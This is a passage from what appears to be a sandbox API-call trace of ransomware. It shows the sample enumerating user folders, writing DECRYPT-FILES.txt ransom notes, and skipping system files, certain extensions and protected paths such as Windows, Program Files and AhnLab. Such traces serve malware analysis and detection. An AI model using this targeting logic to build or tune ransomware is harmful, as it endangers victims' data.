lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0077.818] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.818] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\jkbimi8.tmp") returned 86 [0077.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.821] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0077.821] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.821] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt") returned 92 [0077.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.823] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.824] CloseHandle (hObject=0x44c) returned 1 [0077.824] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0077.824] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0077.824] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.824] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.824] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.824] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.824] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.824] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.824] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.824] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.825] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.825] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.825] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.825] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.825] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.825] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.825] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0077.825] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.825] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0077.825] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\jkbimi8.tmp" [0077.825] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.826] CloseHandle (hObject=0x0) returned 0 [0077.826] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.826] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbda554a0, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbda554a0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0077.826] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0077.826] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0077.826] lstrcatW (in: lpString1="Quick Launch", lpString2="\\" | out: lpString1="Quick Launch\\") returned="Quick Launch\\" [0077.826] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Program Files") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch=":\\Windows") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Games\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\All Users") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="AhnLab") returned 0x0 [0077.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.826] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0077.826] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.826] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\jkbimi8.tmp") returned 99 [0077.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.827] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0077.827] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.827] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt") returned 105 [0077.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.828] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.829] CloseHandle (hObject=0x454) returned 1 [0077.829] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0077.829] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0077.829] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.829] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.829] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.830] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.830] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.830] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.830] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.830] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4eb35ad0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.830] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0077.830] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0077.830] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0077.830] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0077.830] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df47e00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df47e00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a683760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x8e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="autorun.inf") returned 1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot.ini") returned 1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="desktop.ini") returned 1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="iconcache.db") returned -1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootsect.bak") returned 1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat.log") returned -1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="thumbs.db") returned -1 [0077.830] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Bootfont.bin") returned 1 [0077.830] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0077.830] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.830] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.830] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.830] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.830] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.830] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.830] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.831] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0077.831] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.831] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0077.831] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\jkbimi8.tmp" [0077.831] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.831] CloseHandle (hObject=0x0) returned 0 [0077.831] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.831] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb0f970, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb0f970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4eb0f970, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="autorun.inf") returned 1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="boot.ini") returned 1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="desktop.ini") returned 1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="ntuser.dat") returned -1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="iconcache.db") returned 1 [0077.831] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="bootsect.bak") returned 1 [0077.832] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="ntuser.dat.log") returned -1 [0077.832] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="thumbs.db") returned -1 [0077.832] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Bootfont.bin") returned 1 [0077.832] lstrlenW (lpString="Launch Internet Explorer Browser.lnk") returned 36 [0077.832] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.832] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="autorun.inf") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="boot.ini") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="desktop.ini") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="iconcache.db") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootsect.bak") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat.log") returned 1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="thumbs.db") returned -1 [0077.832] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0077.832] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0077.832] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0077.832] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, 